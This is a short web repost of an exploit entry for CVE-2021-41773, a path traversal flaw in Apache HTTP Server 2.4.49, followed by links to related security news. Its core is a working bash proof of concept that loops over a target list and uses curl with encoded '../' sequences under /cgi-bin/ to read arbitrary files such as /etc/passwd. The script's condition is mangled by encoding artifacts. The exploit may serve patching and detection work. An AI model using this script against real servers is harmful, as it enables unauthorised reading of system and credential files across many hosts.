Apache HTTP Server version 2.4.49 suffers from a path traversal vulnerability.
advisories | CVE-2021-41773
# Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal
# Date: 10/05/2021
# Exploit Author: Lucas Souza https://lsass.io
# Vendor Homepage: https://apache.org/
# Version: 2.4.49
# Tested on: 2.4.49
# CVE : CVE-2021-41773
# Credits: Ash Daulton and the cPanel Security Team#!/bin/bash
if [[ $1 =3D=3D '' ]]; [[ $2 =3D=3D '' ]]; then
echo Set [TAGET-LIST.TXT] [PATH]
echo ./PoC.sh targets.txt /etc/passwd
exit
fi
for host in $(cat $1); do
curl --silent --path-as-is --insecure "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done
Related posts:
CISA: Prepare now for quantum computers, not when hackers use them
Critical Fluent Bit flaw impacts all major cloud providers
World Govs, Tech Giants Sign Spyware Responsibility Pledge
Security Flaw in Styra's OPA Exposes NTLM Hashes to Remote Attackers
BazarCall Callback Phishing Attacks Constantly Evolving Its Social Engineering Tactics